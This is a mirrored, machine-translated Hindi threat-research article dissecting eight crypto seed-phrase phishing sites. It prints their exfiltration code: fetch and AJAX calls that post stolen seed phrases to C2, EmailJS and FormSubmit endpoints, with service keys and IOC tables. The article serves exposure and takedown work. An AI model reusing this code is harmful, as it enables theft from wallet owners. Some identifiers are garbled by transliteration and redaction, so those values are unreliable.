Editorial mirrorBrand mentions redacted to public IDs. Hover to inspect. Everything else is theatre.How it works
THE ENABLERS REGISTRYRegistrar accountability archive
Archive LiveRead-only public record · No ads · No tracking
Case file folder with redacted documents and confidential investigation report.
CASE / HI / PHISHING ANATOMY

8 सीड फ़्रेज़ स्टीलर्स रिवर्स-इंजीनियर्ड | फ़िशडिस्ट्रॉय

The Enablers Registry·Editorial mirror·/hi/phishing-anatomy

Public record copy. Brand names withheld, public accreditation numbers preserved. If the body below says “we”, that means the original publisher, not this mirror. TER only preserves, redacts, and re-contextualizes.

क्रिप्टो फ़िशिंग की संरचना:
8 वास्तविक हमलों का विश्लेषण

हमने लाइव फ़िशिंग ट्रैफ़िक को इंटरसेप्ट किया, 5 सीड फ़्रेज़ स्टीलर्स का रिवर्स-इंजीनियरिंग किया, और चोरी किए गए डेटा का पता टेलीग्राम बॉट्स, EmailJS खातों, और फ़िशिंग-एज़-ए-सर्विस बैकएंड्स तक लगाया।

२७ मार्च, २०२६ फिशडिस्ट्रॉय रिसर्च 18 मिनट में पढ़ें
क्रिप्टो फ़िशिंग जांच की संरचना
रोके गए फ़िशिंग ट्रैफ़िक का लाइव विश्लेषण पूरे हमले के बुनियादी ढांचे को उजागर करता है।
8विश्लेषित साइटें
7निकास विधियाँ
1,824+चोरी किए गए क्रेडेंशियल
380+वॉलेट ब्रांड्स
$0आक्रमणकर्ता लागत

हमने क्या पाया

हर दिन, हजारों क्रिप्टोकरेंसी उपयोगकर्ता अपनी फंड्स उन फ़िशिंग साइटों पर खो देते हैं जो वैध वॉलेट सेवाओं से अलग नहीं दिखतीं। लेकिन क्या होता है पीछे नकली "कनेक्ट वॉलेट" बटन? आपकी सीड फ़्रेज़ असल में कहाँ जाती है?

हमने 5 सक्रिय फ़िशिंग साइटों से लाइव HTTP ट्रैफ़िक इंटरसेप्ट किया, उनका पूरा सोर्स कोड डाउनलोड किया, और प्रत्येक डेटा एक्सफ़िल्ट्रेशन एंडपॉइंट को उसकी अंतिम मंज़िल तक ट्रेस किया। यह जांच आधुनिक क्रिप्टो फ़िशिंग की पूरी संरचना को उजागर करती है — उन सोशल इंजीनियरिंग तरकीबों से लेकर जो आपको अपना सीड फ़्रेज़ टाइप करने के लिए प्रेरित करती हैं, उस टेलीग्राम बॉट तक जो इसे रीयल-टाइम में हमलावर तक पहुंचाता है।

अस्वीकरण

इस लेख में दिखाए गए सभी सीड वाक्यांश यादृच्छिक रूप से उत्पन्न परीक्षण डेटा हैं। इस जांच के दौरान कोई वास्तविक क्रेडेंशियल समझौता नहीं हुआ। सभी साइटों की रिपोर्ट उनके संबंधित होस्टिंग प्रदाताओं और दुरुपयोग विभागों को कर दी गई है।

सार्वभौमिक आक्रमण पैटर्न

अलग-अलग ब्रांडिंग और बैकएंड के बावजूद, सभी 8 फ़िशिंग साइटें का पालन करती हैं बिल्कुल वही मनोवैज्ञानिक फ़नल:

लैंडिंग पेजविश्वास निर्माण
वॉलेट चयनकर्ता60–110+ लोगो
नकली "कनेक्टिंग..."3–5 सेकंड का टाइमर
कनेक्शन विफल हो गयाहमेशा विफल होता है
मैनुअल प्रविष्टिबीज / कुंजी / कुंजीस्टोर
बाह्य निकासीटीजी / ईमेल / एपीआई

महत्वपूर्ण अंतर्दृष्टि: "कनेक्टिंग..." एनिमेशन हमेशा विफल होने के लिए हार्डकोड किया गयासाइट #4 के स्रोत कोड में, हमें मिला const success = false — वॉलेट कनेक्शन का कोई प्रयास नहीं है। यह पूरा प्रवाह केवल पीड़ितों को "मैन्युअली कनेक्ट करें" फॉर्म की ओर धकेलने के लिए मौजूद है।

छह-चरणीय क्रिप्टो फ़िशिंग हमले की श्रृंखला
हमारे द्वारा विश्लेषण की गई सभी फ़िशिंग साइटों द्वारा साझा की जाने वाली सार्वभौमिक 6-चरणीय हमला श्रृंखला

8 स्थल: पूरा विवरण

1
नेटवर्क परत प्रोटोकॉल
नेटवर्कलेयर्स.पेजेस.डेव
प्रत्यक्षक्लाउडफ्लेयर पेजेज़टेलीग्राम बॉट + ईमेलजेएस

भेषधारण

वॉलेट सत्यापन के लिए एक काल्पनिक "विकेंद्रीकृत प्रोटोकॉल"। विश्वसनीयता के लिए यह लाइव CryptoCompare प्राइस टिकर और वास्तविक ब्लॉकचेन एक्सप्लोरर्स (इथेरियम, BSC, पॉलीगॉन, एवलान्च, सोलैना, कार्डानो) के लिंक का उपयोग करता है। लैंडिंग पेज में 100+ वॉलेट लोगो और 3-चरणीय "प्रमाणीकरण" प्रक्रिया शामिल है।

द्वैध निकासी श्रृंखला

सबसे परिष्कृत बैकएंड 5 में से — हर चोरी की गई क्रेडेंशियल इसके माध्यम से भेजी जाती है दो स्वतंत्र चैनल एक साथ:

Victim submits seed phrase
  |
  +--> Channel 1: axios POST --> Express.js on [REDACTED]
  |      |
  |      +--> [REDACTED] Bot API --> @metatech2 (instant DM)
  |
  +--> Channel 2: fetch POST --> EmailJS API
         |
         +--> Bestgrace309@gmail.com (email backup)

ओएसआईएनटी निष्कर्ष

सूचकमूल्य
ठग का ईमेलBestgrace309@gmail.com
टेलीग्राम बॉट@DewdropsTG_bot (आईडी: 7567323692)
टेलीग्राम प्राप्तकर्ता@metatech2 (चैट आईडी: 7350941887)
बैकएंडईमेलजेएस-बैकएंड-ओवीटीजी.ऑनरेंडर.कॉम
ईमेलजेएस सेवाservice_d5qigxs / template_7bqxeaa
छिपा हुआ डोमेनलेयरचेन.इन (सीएफ ईमेल अस्पष्टता से)
भेजे गए संदेश1,824+ (टेलीग्राम मैसेज_id से)
डोमेन आयु2 दिन (TLS: 25 मार्च, 2026)
ओपीसेक विफलता

हमलावर का ईमेल एक में पाया गया था। जावास्क्रिप्ट टिप्पणी अंदर config.js: // Bestgrace309@gmail.com. उन्होंने इसे तैनात करने से पहले हटाना भूल गए। इसके अतिरिक्त, टेलीग्राम रिले बैकएंड पूरी तरह से खुला है — कोई प्रमाणीकरण नहीं, कोई दर सीमा नहीं। क्लाउडफ्लेयर के डीकोड करके data-cfemail HTML में obfuscation, हमने एक छिपा हुआ ईमेल भी उजागर किया: support@layerschain.in, भारतीय और दक्षिण अफ्रीकी होस्टिंग अवसंरचना से जुड़ता हुआ।

2
एक्ला टोकन माइग्रेशन
[REDACTED]
प्रत्यक्षक्लाउडफ्लेयर पेजेज़गैर-स्थिर फ़ॉर्म

भेषधारण

वास्तविक की एक पिक्सेल-परफेक्ट खरोंच एक्वालिब्रे (एक्ला) टोकन माइग्रेशन पृष्ठ। HTML में एक मेटाडेटा टैग है जो स्रोत प्रकट करता है: data-scrapbook-source="https://token.[REDACTED]/migration", 19 नवंबर, 2024 को समय-मुद्रित।

शून्य-कोड दृष्टिकोण

इस आक्रमणकारी को आवश्यकता है शून्य सर्वर-साइड कोड. फ़ॉर्म सीधे को पोस्ट करता है गैर-स्थिर — स्थिर साइटों के लिए एक वैध फॉर्म बैकएंड। हर सबमिशन को ठग के ईमेल पर भेज दिया जाता है। हमलावर का ईमेल है सोर्स कोड में कभी भी दिखाई नहीं देता.

<form action="https://forms.[REDACTED]/forms/c78173e2d991...94c3f76">
  <textarea name="phrase"></textarea>
  <input name="private-key" />
  <textarea name="keystore-json"></textarea>
  <input name="password" />
</form>
लागत: $0

IANA #1910 Pages: मुफ़्त। अन-स्टैटिक फ़ॉर्म्स: मुफ़्त। कोई डोमेन खरीदे नहीं गए। कोई सर्वर किराए पर नहीं लिए गए। कुल बुनियादी ढांचे की लागत: शून्य डॉलर.

3
सेफपाल टाइपोस्क्वाट
[REDACTED]
प्रत्यक्ष क्लाउडफ्लेयर पेजेज़ गैर-स्थिर फ़ॉर्म

भेषधारण

सबडोमेन में " शामिल हैसेफपाल— का एक जानबूझकर किया गया गलत वर्तनीकरण सेफपाल, एक लोकप्रिय हार्डवेयर वॉलेट। साइट 26 नकली समस्या श्रेणियों के साथ "ब्लॉकचेन वॉलेट सुधार" के रूप में प्रस्तुत होती है। यह चेन नामों (इथेरियम, बीएससी, पॉलीगॉन...) को एनिमेट करने के लिए टाइप्ड.जेएस और विश्वसनीयता के लिए लाइवकॉइनवॉच टिकर का उपयोग करती है।

वही किट, वही ऑपरेटर?

का उपयोग करता है बिल्कुल वही फ़िशिंग टेम्पलेट साइट #2 के रूप में: समान connect.html, एकसमान wallets.html 60+ लोगो के साथ, वही अन-स्टैटिक बैकएंड (अलग फॉर्म आईडी — 6f1b82c3...da9943af). समान किट दृढ़ता से सुझाव देती है एक ऑपरेटर दोनों साइटें चला रहा है.

कोड में चेतावनी संकेत: "Privay Policy" (एक 'c' गायब), "seperated" (होना चाहिए "separated"), "Kestore" (एक 'y' गायब)। पासवर्ड फ़ील्ड का उपयोग करता है type="text" के बजाय type="password".

4
फ्लेयर नेटवर्क क्लोन
[REDACTED]
प्रत्यक्षक्लाउडफ्लेयर पेजेज़डुअल ईमेलजेएस (अतिरिक्तता)

भेषधारण

के एक लगभग-परिपूर्ण क्लोन फ्लेयर नेटवर्क पोर्टल — एक वास्तविक लेयर-1 EVM ब्लॉकचेन, जिसमें FTSO और डेटा कनेक्टर प्रोटोकॉल शामिल हैं। यह 30+ इकोसिस्टम पार्टनर्स, नेविगेशन और ब्रांडिंग को प्रतिकृति करता है। फेविकॉन्स एक टाइपोस्क्वाट से लोड किए गए हैं: [REDACTED] (mainnet से एक 'n' गायब है)।

Dual EmailJS रिडंडेंसी

एकमात्र साइट जो उपयोग कर रही है एक साथ दो अलग-अलग EmailJS खाते हटाए जाने के खिलाफ अतिरिक्त सुरक्षा के लिए:

// Channel 1: EmailJS SDK
emailjs.send('service_6dt5h1k', 'template_hjqp9gb', payload)
// Key: Sza6lhzA9hKHrm1k4

// Channel 2: jQuery AJAX direct
$.ajax('https://api.[REDACTED]/api/v1.0/email/send', {
  data: { service_id: 'service_isy47de',
          template_id: 'template_dkk4d1b',
          user_id: 'JsVEgXVcaSTro1etu' }
})

हर चोरी के लिए ईमेल विषय: "New Wallet Details from Flare".

यह एक वित्त पोषित व्यवसाय है।

HTML में शामिल हैं गूगल टैग मैनेजर (GTM-WX2D2TR), माइक्रोसॉफ्ट क्लैरिटी (j4bllybjkp), लुनियो पीपीसी सुरक्षा, और एक ट्विटर/एक्स विज्ञापन पिक्सेल. हमलावर भाग रहा है भुगतान विज्ञापन पीड़ितों को फ़िशिंग साइट पर ले जाने और बॉट क्लिकों को फ़िल्टर करने के लिए। यह कोई शौक नहीं है — यह एक वित्त पोषित अभियान है जिसमें एनालिटिक्स और विज्ञापन खर्च शामिल हैं।

Flare Network फिशिंग साइट डुअल EmailJS और सशुल्क विज्ञापन के साथ
साइट #4: सशुल्क विज्ञापन, विश्लेषण ट्रैकिंग, और दोहरी निकासी — सबसे पेशेवर अभियान
5
कॉइन नोड / वॉलेट फिक्स (PhaaS)
[REDACTED]
बैकएंड बंदपल्सरिज़ॉल्व एपीआई (फास)

भेषधारण

एक सामान्य "COIN NODE" / "Wallet Fix" सेवा (कोई विशिष्ट ब्रांड नहीं)। कॉपीराइट "Wallet Fix 2022" — यह किट टेम्पलेट कम से कम 4 साल पुराना है। छवियाँ होस्ट की गई हैं [REDACTED] (WordPress ऑन AWS).

फ़िशिंग-एज़-ए-सर्विस

सबसे चिंताजनक बैकएंड आर्किटेक्चर: एक यूयूआईडी-आधारित बहु-किरायेदार एपीआई:

POST https://api.[REDACTED]/a26db20c-1dc4-4208-a60a-c2c3b22c02ef
Content-Type: multipart/form-data

wallet=[REDACTED]&type=phrase&phrase=buddy+surprise+vapor+river+...

प्रत्येक ठग को अपना स्वयं का UUID एंडपॉइंट मिलता है। एक केंद्रीय ऑपरेटर API का रखरखाव करता है, अभियानों पर नज़र रखता है, और संभवतः चोरी किए गए धन का एक हिस्सा लेता है। यह है औद्योगिकीकृत क्रिप्टो चोरी — एक फ़िशिंग-एज़-ए-सर्विस मॉडल।

संबंधित अवसंरचना (अधिकांशतः निष्क्रिय)

डोमेनभूमिकास्थिति
एपीआई.पल्सरेसॉल्व.कॉमएक्सफिल्ट्रेशन एपीआईएनएक्सडीओएमेन
वॉलेटइश्यूज़फिक्स.नेटफ़ैविकॉन होस्टएनएक्सडीओएमेन
सिंकवॉलेट डॉट ऑनलाइनलोगो होस्टएनएक्सडीओएमेन
पम्पैथ.कॉमछवि सीडीएनलाइव (एडब्ल्यूएस)
ज़ॉम्बी फ्रंटएंड

बैकएंड बंद है, लेकिन फ्रंटएंड अभी भी लाइव है क्लाउडफ्लेयर पेजेज़ पर। यदि हमलावर पुनः पंजीकरण करता है [REDACTED], साइट तुरंत फिर से चालू हो जाती है।

6
समर्थन केंद्र + लेजर पुनर्प्राप्ति
[REDACTED] और [REDACTED]-recovery.support
प्रत्यक्षक्लाउडफ्लेयर पेजेज़ + रिप्लिटकस्टम C2 एपीआईBIP39 स्व-पूर्ति

भेषधारण

A दोहरा अभियान: एक सामान्य "समर्थन केंद्र" पर [REDACTED] 15 नकली जारी श्रेणियों और 39 वॉलेट ब्रांडों के साथ, साथ ही एक पिक्सेल-परफेक्ट लेजर ऑनबोर्डिंग क्लोन पर [REDACTED]-recovery.support Replit पर होस्ट किया गया — डिवाइस मॉडल चयन, पिन सेटअप, और 24-शब्दों वाले सीड वाक्यांश ग्रिड के साथ वास्तविक BIP39 स्वतः-पूर्ति.

एंटी-स्कैनर C2 बैकएंड

वॉलेट सपोर्ट पेज चोरी किया गया डेटा को भेजता है [REDACTED]/log — क्लाउडफ्लेयर के पीछे एक कस्टम nginx/Ubuntu C2। बैकएंड जानबूझकर सभी GET अनुरोधों को ड्रॉप करता है (522 टाइमआउट लौटाता है), केवल POST पर प्रतिक्रिया करता है। इसका मतलब है कि URL स्कैनर, Google Safe Browsing क्रॉलर और सुरक्षा शोधकर्ता GET के साथ एंडपॉइंट को पिंग करने पर कुछ भी नहीं देखते — C2 निष्क्रिय प्रतीत होता है।

// config.js — C2 config exposed in plaintext
const config = {
  serverURL: "https://api.[REDACTED]",
  allowedWallets: ["[REDACTED]","solfare","[REDACTED]","[REDACTED]",
    "[REDACTED]","[REDACTED]","[REDACTED]","VARA Provisional License","sui","backpack",
    "tonkeeper","magiceden","slush" /* + 26 more */]
};
window.IWMConfig = config;

// Exfiltration function (deobfuscated from bundle)
function Ae(seedPhrase, passPhrase, walletName) {
  fetch(serverURL + "/log", {
    method: "POST",
    headers: {"Content-Type": "application/json"},
    body: JSON.stringify({seedPhrase, passPhrase, walletName, apiKey})
  })
}

लेजर क्लोन Replit पर ही एक अलग Express.js बैकएंड चलाता है: POST /api/recovery-phrase एकत्र करना {deviceId, pin, phrase}. यह लौटता है 400 {"error":"Invalid data provided"} खराब इनपुट पर — यह पुष्टि करते हुए कि बैकएंड है जीना और सक्रिय रूप से सत्यापित करना चोरी किया गया डेटा।

ओएसआईएनटी निष्कर्ष

सूचकमूल्य
फ्रंटएंड (वॉलेट)[REDACTED]
फ्रंटएंड (लेजर)लेजर-रिकवरी.सपोर्ट (34.111.179.208)
सी2 बैकएंड एपीआई.उरानुस्टोकन.ऑर्ग → एनजीआईएनएक्स/1.24.0 उबंटू
सी2 आईपीज़104.21.60.163 / 172.67.198.35 (क्लाउडफ्लेयर)
रिप्लिट सत्यापित करेंa43d3852-5304-47af-a61b-f0f6f3912736
पंजीयक[REDACTED] ([REDACTED]-recovery.support)
तैनात9 जनवरी, 2026 (अंतिम-संशोधित हेडर)
तकनीकी ढांचा रिएक्ट + वाइट + टेलविंड v4.1 + फ्रेमर मोशन
अत्युच्च यूएक्स निष्ठा

466 KB का JS बंडल में शामिल है पूर्ण BIP39 शब्द सूची रियल-टाइम ऑटो-कम्प्लीट के लिए, "पासफ्रेज" के 67 संदर्भ, "मनोनोनिक" के 39। लेजर क्लोन पीड़ितों को बिल्कुल असली लेजर डिवाइस के समान ऑनबोर्डिंग फ्लो से गुज़रवाता है — इस पूरी जांच में सबसे विश्वसनीय फ़िशिंग पेज। apiKey कॉन्फ़िग में फ़ील्ड एक का सुझाव देती है मल्टी-टेनेंट PhaaS वास्तुकला.

7
विकेंद्रीकृत लॉन्चपैड
मेननेटप्रमाणीकरणऐप.पेजेस.डेव
प्रत्यक्षक्लाउडफ्लेयर पेजेज़फ़ॉर्म सबमिट डॉट कॉ

भेषधारण

एक सामान्य "विकेंद्रीकृत लॉन्चपैड" के साथ 21 चारा श्रेणियाँ (स्टेकिंग, माइग्रेशन, केवाईसी, गिवअवे, पुरस्कार क्लेम, संपत्ति वसूली, प्री-सेल, एनएफटी मिंट, लॉक्ड खाते...) और 70+ वॉलेट ब्रांड्स — यह उन सबसे व्यापक वॉलेट सूचियों में से एक थी जिनका हमने सामना किया। स्पष्ट रूप से झलकने वाली टाइपो "Sychronize" (एक 'n' की कमी) नकली होने का भंडाफोड़ करती है।

फ़ॉर्मसबमिट Pipeline

उपयोग फ़ॉर्म सबमिट डॉट कॉ — एक वैध फॉर्म-से-ईमेल सेवा। एंडपॉइंट हैश a2cf4131f1a5d39453c7c183df96f86f यह ठग के ईमेल पते का MD5 है। हमने Gmail, Yahoo, Hotmail, ProtonMail, Yandex और [REDACTED] पर सैकड़ों ईमेल पैटर्न को ब्रूट-फोर्स किया — कोई मेल नहींठग एक असामान्य या यादृच्छिक रूप से उत्पन्न ईमेल का उपयोग करता है।

// Exfiltration via jQuery AJAX → FormSubmit → scammer email
$.ajax({
    url: "https://formsubmit.co/ajax/a2cf4131f1a5d39453c7c183df96f86f",
    method: "POST",
    dataType: "JSON",
    data: {
        dappWord: seedPhrase,       // THE STOLEN SEED PHRASE
        dappName: walletName,       // Which wallet was selected
        linkName: "DAPP DECENTRALIZED"  // Campaign identifier
    }
});

ओएसआईएनटी निष्कर्ष

सूचकमूल्य
डोमेनमेननेटप्रमाणीकरणऐप.पेजेस.डेव
फ़ॉर्म सबमिट हैशa2cf4131f1a5d39453c7c183df96f86f
अभियान आईडीडेप विकेंद्रीकृत
फ़ॉन्टावesome किटbdc3291137 (किट #112310842, मुफ्त v6.7.2)
जेक्वेरी3.2.1 + 3.5.1 एक साथ लोड
बूटस्ट्रैपसीएसएस 5.2.2 + जेएस 5.3.0-अल्फा1 (अनुपालनहीनता)
दो ट्रैकिंग हैंडल

फ़ॉन्टावesome किट bdc3291137 — FontAwesome इस किट आईडी के पीछे के खाते के मालिक की पहचान कर सकता है। अभियान टैग DAPP DECENTRALIZED एक ही FormSubmit हैश का उपयोग करके अन्य फ़िशिंग साइटों पर भी दिखाई दे सकता है। सीड वाक्यांश चुराने के बाद, एक नकली क्यूआर कोड और यादृच्छिक 7-अक्षर का संदर्भ कोड प्रदर्शित किया जाता है: "अपने अद्वितीय रेफ़ कोड के साथ एडमिन से संपर्क करें" — जांच करने के बजाय पीड़ितों को इंतजार में रखा जाता है।

8
आर2 बकेट + पीएचपी होम कंप्यूटर पर
pub-519769e9eb634616b1746c2018641d56.r2.dev
मृतक्लाउडफ्लेयर आर2PHP + डीडीएनएस

भेषधारण

अज्ञात — फ्रंटएंड और बैकएंड दोनों ऑफ़लाइन हैं। पेलोड संरचना के आधार पर, यह एक क्रिप्टो वॉलेट सीड फ़्रेज़ स्टीलर था। क्लाउडफ्लेयर R2 सार्वजनिक बकेट (ऑब्जेक्ट स्टोरेज, पेज नहीं) एक है अच्छी तरह से प्रलेखित फ़िशिंग माध्यम 5,000+ दुर्भावनापूर्ण पृष्ठों की पहचान और Netskope द्वारा 61 गुना ट्रैफ़िक वृद्धि की सूचना के साथ।

स्क्रिप्ट किडी सेटअप

सबसे अधिक मूलभूत क्रिया इस संग्रह में। सीड वाक्यांश भेजे जाते हैं। शब्द-शब्द मुफ्त डायनामिक डीएनएस के पीछे एक होम कंप्यूटर या वीपीएस पर चलने वाली एक PHP स्क्रिप्ट:

POST [REDACTED]/fuc.php
Content-Type: application/x-www-form-urlencoded

pass=Word+1:+finger+%0AWord+2:+flag+%0AWord+3:+across
    +%0AWord+4:+admit+%0AWord+5:+weather+%0AWord+6:+fragile
    +%0AWord+7:+trick+%0AWord+8:+weekend+%0AWord+9:+gift
    +%0AWord+10:+grit+%0AWord+11:+borrow+%0AWord+12:+access

ओएसआईएनटी निष्कर्ष

सूचकमूल्य
फ्रंटएंड pub-519769e9eb634616b1746c2018641d56.r2.dev [ऑफ़लाइन]
बैकएंड दयालुजिग्गा4रियल123.पब्लिकवीएम.कॉम [एनवाईडीोमेन]
आर2 बकेट आईडी519769e9eb634616b1746c2018641d56
डीडीएनएस प्रदाता [REDACTED] / नेटडॉर्म, इंक. (सिनसिनाटी, ओहायो)
डीएनएस एनएसns10–[REDACTED]
उपयोगकर्ता नामदयालुजिग्गावास्तविक123
यूज़रनेम OSINT: mercifuljigga4real123

"दयालु" + "जिगा" (जे-ज़ेड का उपनाम) + "4real" + "123" — एक विशिष्ट रूप से व्यक्तिगत हैंडल जो हिप-हॉप संस्कृति के प्रति लगाव को दर्शाता है। नहीं मिला किसी भी इंडेक्स्ड प्लेटफ़ॉर्म पर: GitHub, X, Instagram, TikTok, Reddit, YouTube, Twitch, या [REDACTED]। संभवतः [REDACTED], [REDACTED], या गेमिंग प्लेटफ़ॉर्म पर इस नाम या इसके निकट समान नामों के तहत सक्रिय। फ़ाइल का नाम fuc.php हैंडल की बेबाक शैली से मेल खाता है।

आपके सीड फ़्रेज़ को चुराने के 7 तरीके

चार क्रिप्टो फ़िशिंग डेटा एक्सफिल्ट्रेशन तरीकों की तुलना
8 फ़िशिंग साइटों पर सात अलग-अलग एक्सफ़िल्ट्रेशन आर्किटेक्चर का उपयोग किया गया।
विधिसाइटेंयह कैसे काम करता हैगतिलागत
टेलीग्राम बॉट#1 [REDACTED] पर Express.js Bot API को प्रॉक्सी करता है। ठग को क्रेडेंशियल्स के साथ तुरंत डीएम मिलता है। वास्तविक समय$0
ईमेलजेएस#1, #4 क्लाइंट-साइड जावास्क्रिप्ट सीधे EmailJS API को भेजता है, जो ठग के ईमेल पर भेजता है। लगभग 1 मिनट$0
गैर-स्थिर फ़ॉर्म#2, #3 मानक HTML फ़ॉर्म POST एक वैध फ़ॉर्म सेवा को जो सबमिशन को ईमेल के माध्यम से अग्रेषित करती है। लगभग 1 मिनट$0
फ़ॉर्म सबमिट डॉट कॉ#7 jQuery AJAX से FormSubmit.co तक। ईमेल पता MD5 हैश के पीछे छिपा हुआ है। अभियान को "DAPP DECENTRALIZED" के रूप में टैग किया गया है। लगभग 1 मिनट$0
कस्टम C2 एपीआई#6 [REDACTED] IANA #1910 के पीछे nginx/Express API को भेजता है। ड्रॉप्स GET अनुरोध (522) स्कैनरों से बचने के लिए। केवल POST पर प्रतिक्रिया करता है। वास्तविक समय~$5/माह
PHP + डीडीएनएस#8 नि:शुल्क डायनामिक डीएनएस ([REDACTED]) के माध्यम से घरेलू कंप्यूटर पर PHP स्क्रिप्ट। सीड वाक्यांश शब्द-दर-शब्द भेजा गया। वास्तविक समय$0
पीएचएएस एपीआई#5 UUID-आधारित बहु-किरायेदार API। केंद्रीय ऑपरेटर बैकएंड का प्रबंधन करता है, धोखेबाज एंडपॉइंट किराए पर लेते हैं। वास्तविक समयअज्ञात

7 चेतावनी संकेत जो हर फ़िशिंग साइट का भंडाफोड़ करते हैं

अगर आप देखते हैं कोई भी इनमें से, टैब को तुरंत बंद करें:

1. "कनेक्शन विफल" हमेशा नकली होता है

वास्तविक वॉलेट कनेक्शन WalletConnect प्रोटोकॉल या ब्राउज़र एक्सटेंशन का उपयोग करते हैं। वे कभी भी "कनेक्शन विफल" त्रुटि नहीं दिखाते जिसमें आपसे अपना सीड वाक्यांश टाइप करने के लिए कहा जाए।

2. 50–110+ वॉलेट लोगो, एक ही गंतव्य

हर वॉलेट आइकन एक ही फॉर्म पर ले जाता है। एक वास्तविक सेवा प्रत्येक वॉलेट के असली SDK को एकीकृत करेगी।

3. सबमिट करने के बाद "त्रुटि"

सबमिट करने के बाद दिखाया जाने वाला नकली "503 त्रुटि" या "अज्ञात त्रुटि" जानबूझकर किया गया है। आपका डेटा पहले ही चुरा लिया गया था — यह त्रुटि आपको दूसरे वॉलेट के साथ फिर से प्रयास करने के लिए धोखा देती है।

4. .pages.dev पर होस्ट किया गया

सभी 5 साइटें IANA #1910 Pages के मुफ्त स्तर का दुरुपयोग करती हैं। पहचान सत्यापन की आवश्यकता नहीं है। IANA #1910 Pages पर फ़िशिंग दुरुपयोग 2025 में 198% बढ़ गया।

5. तीन टैब: वाक्यांश / निजी कुंजी / कीस्टोर

कोई भी वैध सेवा को इन तीनों प्रमाण-पत्र प्रकारों की आवश्यकता नहीं होती। यह ट्रिपल-टैब फॉर्म एक फ़िशिंग किट का हस्ताक्षर है।

6. कोई ब्लॉकचेन इंटरैक्शन नहीं

इनमें से कोई भी साइट लोड नहीं हो रही है। ethers.js, web3.js, या कोई RPC कॉल करें। ये शुद्ध HTML फॉर्म हैं जो dApps होने का दिखावा कर रहे हैं।

7. शून्य-लागत अवसंरचना

मुफ्त होस्टिंग + मुफ्त फॉर्म सेवाएँ + मुफ्त संदेश सेवा = $0 में एक पूरा फ़िशिंग ऑपरेशन। यदि साइट का कोई वास्तविक डोमेन नहीं है, तो संदेह करें।

पूर्ण IOC तालिका

सुरक्षा टीमों, खतरे की खुफिया जानकारी प्लेटफ़ॉर्मों, और दुरुपयोग रिपोर्ट करने वालों के लिए:

डोमेन और अवसंरचना

डोमेनप्रकारस्थिति
नेटवर्कलेयर्स.पेजेस.डेवफ़िशिंग फ्रंटएंडप्रत्यक्ष
[REDACTED]फ़िशिंग फ्रंटएंडप्रत्यक्ष
[REDACTED]फ़िशिंग फ्रंटएंडप्रत्यक्ष
[REDACTED]फ़िशिंग फ्रंटएंडप्रत्यक्ष
[REDACTED]फ़िशिंग फ्रंटएंडप्रत्यक्ष
ईमेलजेएस-बैकएंड-ओवीटीजी.ऑनरेंडर.कॉमटीजी रिले बैकएंडप्रत्यक्ष
पोर्टल.फ्लैरमेननेट.कॉमटाइपोस्क्वाट संपत्तियाँअज्ञात
लेयरचेन डॉट इनसंबंधित डोमेनडीएनएस बंद
एपीआई.पल्सरेसॉल्व.कॉमपीएचएएस बैकएंडएनएक्सडीओएमेन
वॉलेटइश्यूज़फिक्स.नेटसंपत्ति होस्टएनएक्सडीओएमेन
सिंकवॉलेट डॉट ऑनलाइनलोगो होस्टएनएक्सडीओएमेन
पम्पैथ.कॉमछवि सीडीएनलाइव (एडब्ल्यूएस)
[REDACTED]फ़िशिंग फ्रंटएंडप्रत्यक्ष
लेजर-रिकवरी.सपोर्टलेजर फ़िशिंग (रिप्लिट)प्रत्यक्ष
एपीआई.उरानुस्टोकन.ऑर्गC2 बैकएंड (एनजीआईएनएक्स/उबंटू)प्रत्यक्ष
यूरेनस टोकन डॉट ओआरजीमूल डोमेन404
मेननेटप्रमाणीकरणऐप.पेजेस.डेवफ़िशिंग फ्रंटएंडप्रत्यक्ष
pub-519769e9eb634616b1746c2018641d56.r2.devफ़िशिंग (R2 बकेट)ऑफ़लाइन
दयालुजिग्गा4रियल123.पब्लिकवीएम.कॉमPHP बैकएंड (डीडीएनएस)एनएक्सडीओएमेन

खाते और पहचानकर्ता

प्रकारमूल्यसाइट
ईमेलBestgrace309@gmail.com#1
ईमेल (छिपा हुआ)support@layerschain.in#1
टेलीग्राम बॉट@DewdropsTG_bot (7567323692)#1
टेलीग्राम उपयोगकर्ता@metatech2 (7350941887)#1
EmailJS #1service_d5qigxs / I-7q0Bs-ilK3rFcWj#1
ईमेलजेएस #2service_6dt5h1k / Sza6lhzA9hKHrm1k4#4
ईमेलजेएस #3service_isy47de / JsVEgXVcaSTro1etu#4
गैर-स्थिर फ़ॉर्मc78173e2d991...94c3f76#2
गैर-स्थिर फ़ॉर्म6f1b82c3ce55...da9943af#3
PhaaS यूयूआईडीa26db20c-1dc4-4208-a60a-c2c3b22c02ef#5
जीटीएमजीटीएम-डब्ल्यूएक्स2डी2टीआर#4
एमएस क्लैरिटीजे4ब्लिबीजेकेपी#4
रेंडर उदाहरणआरएनडीआर-आईडी: ed83576e-b1b3-4c82#1
रिप्लिट सत्यापित करेंa43d3852-5304-47af-a61b-f0f6f3912736#6
फ़ॉर्म सबमिट एमडी5a2cf4131f1a5d39453c7c183df96f86f#7
अभियान टैगडेप विकेंद्रीकृत#7
फ़ॉन्टावesome किटbdc3291137 (किट #112310842)#7
आर2 बकेट आईडी519769e9eb634616b1746c2018641d56#8
यूज़रनेम/डीडीएनएसदयालुजिग्गावास्तविक123#8

क्रिप्टो फ़िशिंग की रिपोर्ट कहाँ करें

क्रिप्टो फ़िशिंग साइट्स की रिपोर्ट कहाँ करें — बहु-दिशात्मक कार्रवाई
अधिकतम हटाने की गति के लिए होस्टिंग, बैकएंड सेवाओं और मैसेजिंग प्लेटफ़ॉर्म को एक साथ लक्षित करना
सेवाक्या रिपोर्ट करेंकैसे
क्लाउडफ्लेयर7x .pages.dev + 1x R2 बकेटदुरुपयोग.क्लाउडफ्लेयर.कॉम
गूगल सुरक्षित ब्राउज़िंगसभी फ़िशिंग यूआरएलफ़िश की रिपोर्ट करें
फ़िशटैंकसमुदाय ब्लैकलिस्ट के लिए सभी यूआरएलफिशटैंक.ऑर्ग
ईमेलजेएस3 दुरुपयोग किए गए खाते (उपरोक्त सेवा आईडी)abuse@emailjs.com
गैर-स्थिर2 फॉर्म एंडपॉइंट्स[REDACTED] के माध्यम से संपर्क करें
रेंडर डॉट कॉमटेलीग्राम रिले बैकएंडदुरुपयोग फॉर्म प्रस्तुत करें
टेलीग्राम@DewdropsTG_bot + @metatech2[REDACTED].org/support
गूगल (जीमेल)Bestgrace309@gmail.comGoogle दुरुपयोग रिपोर्ट
